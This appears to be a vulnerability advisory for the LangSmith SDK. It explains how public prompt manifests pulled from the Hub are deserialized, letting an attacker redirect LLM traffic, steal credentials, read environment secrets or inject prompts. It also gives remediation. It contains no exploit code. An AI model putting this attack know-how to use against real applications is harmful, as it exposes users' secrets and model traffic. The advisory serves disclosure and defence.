LangSmith SDK: Public prompt pull deserializes untrusted manifests without trust boundary warning
Description
Description
The LangSmith SDK's prompt pull methods (pull_prompt / pull_prompt_commit in Python, pullPrompt / pullPromptCommit in JS/TS) fetch and deserialize prompt manifests from the LangSmith Hub. These manifests may contain serialized LangChain objects and model configuration that affect runtime behavior. When pulling a public prompt by owner/name identifier, the manifest content is controlled by an external party, but prior versions of the SDK did not distinguish this from pulling a prompt within the caller's own organization.
Prompt manifests can intentionally configure a model with a custom base URL, default headers, model name, or other constructor arguments. These are supported features, but they also mean the prompt contents should be treated as executable configuration rather than plain text. A prompt can also include serialized LangChain Runnable or PromptTemplate objects with attacker-controlled constructor kwargs, or secret references that, if secrets_from_env is enabled, read environment variables at deserialization time. Applications are exposed when all of the following are true:
- The application calls
pull_promptorpull_prompt_commit(Python) orpullPromptorpullPromptCommit(JS/TS) with a publicowner/nameprompt identifier. - The prompt was published or modified by an untrusted or compromised account.
- The application uses the pulled prompt without independently validating its contents.
Applications that only pull prompts from their own organization (referenced by name only, without an owner/ prefix) are not affected by the public prompt trust boundary issue described above. However, same-organization prompts carry their own risk. If an attacker gains write access to the organization (for example, through a leaked LANGSMITH_API_KEY or a compromised team member account), they can push a malicious prompt that is pulled and deserialized without any additional warning.
Impact
An attacker who publishes a malicious prompt to LangSmith Hub may be able to affect applications that pull that prompt by owner/name. If the prompt manifest reaches the SDK's deserialization path, the SDK will instantiate the referenced LangChain objects with the attacker-supplied constructor arguments rather than treating the manifest as inert data.
Realistic impacts include:
- Server-side request forgery (SSRF), outbound request redirection, and interception of LLM traffic if a prompt manifest configures an LLM client with an attacker-controlled
base_url, proxy, or equivalent endpoint-setting parameter. In typical deployments, redirected requests may include prompt contents, system prompts, retrieved context, model parameters, provider credentials, or other secrets and may disclose them to the attacker-controlled endpoint. - Prompt injection or behavior manipulation if a manifest embeds attacker-controlled system messages, prompt templates, or model parameters that alter the application's behavior.
- Additional deserialization risk when
include_model=Trueis passed, because this expands the allowlist to partner integration classes. This is not the default, but it materially increases risk when pulling prompts from outside the caller's organization.
Remediation
The LangSmith SDK now blocks pulling public prompts by owner/name by default. Callers must explicitly opt in by passing dangerously_pull_public_prompt=True (Python) or dangerouslyPullPublicPrompt: true (JS/TS) to acknowledge the trust boundary. This flag should only be set after reviewing and trusting the prompt contents, not merely the publishing account.
Upgrade to LangSmith SDK Python >= 0.8.0 or JS/TS >= 0.6.0.
Guidance for prompt pull methods
The prompt pull methods (pull_prompt / pull_prompt_commit in Python, pullPrompt / pullPromptCommit in JS/TS) should be used only with trusted prompts. Do not pull public prompts by owner/name from untrusted or unreviewed sources without understanding that the manifest contents will be deserialized and may affect runtime behavior.
When pulling prompts that include model configuration (include_model=True in Python, includeModel: true in JS/TS), the deserialization allowlist expands to include partner integration classes. Because this mode is not the default and is often unnecessary for third-party prompts, prefer the default (false) when pulling prompts from sources outside your organization.
Avoid passing secrets_from_env=True (Python) when pulling untrusted prompts. This parameter allows prompt manifests to read environment variables during deserialization. Only use it with trusted prompts from your own organization.
Same-organization prompts
Prompts pulled from the caller's own organization (referenced by name only, without an owner/ prefix) are not gated by the new dangerously_pull_public_prompt flag, but they are not inherently safe. If an attacker gains write access to the organization (for example, through a leaked LANGSMITH_API_KEY or a compromised team member account), they can push a malicious prompt that redirects LLM traffic to attacker-controlled infrastructure and may disclose any credentials attached to those requests.
The security of same-organization prompts follows a shared responsibility model. The LangSmith SDK enforces trust boundaries for public prompts pulled from external accounts, but it cannot protect against compromised credentials or accounts within the caller's own organization. Securing API keys, managing team member access, and reviewing prompt contents before production deployment are the responsibility of the organization. Organizations should treat prompts as executable configuration and apply the same review and audit practices they would apply to application code.
Credits
First reported by @Moaaz-0x.
Affected products
1- Range: < 0.3.30
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
2News mentions
0No linked articles in our index yet.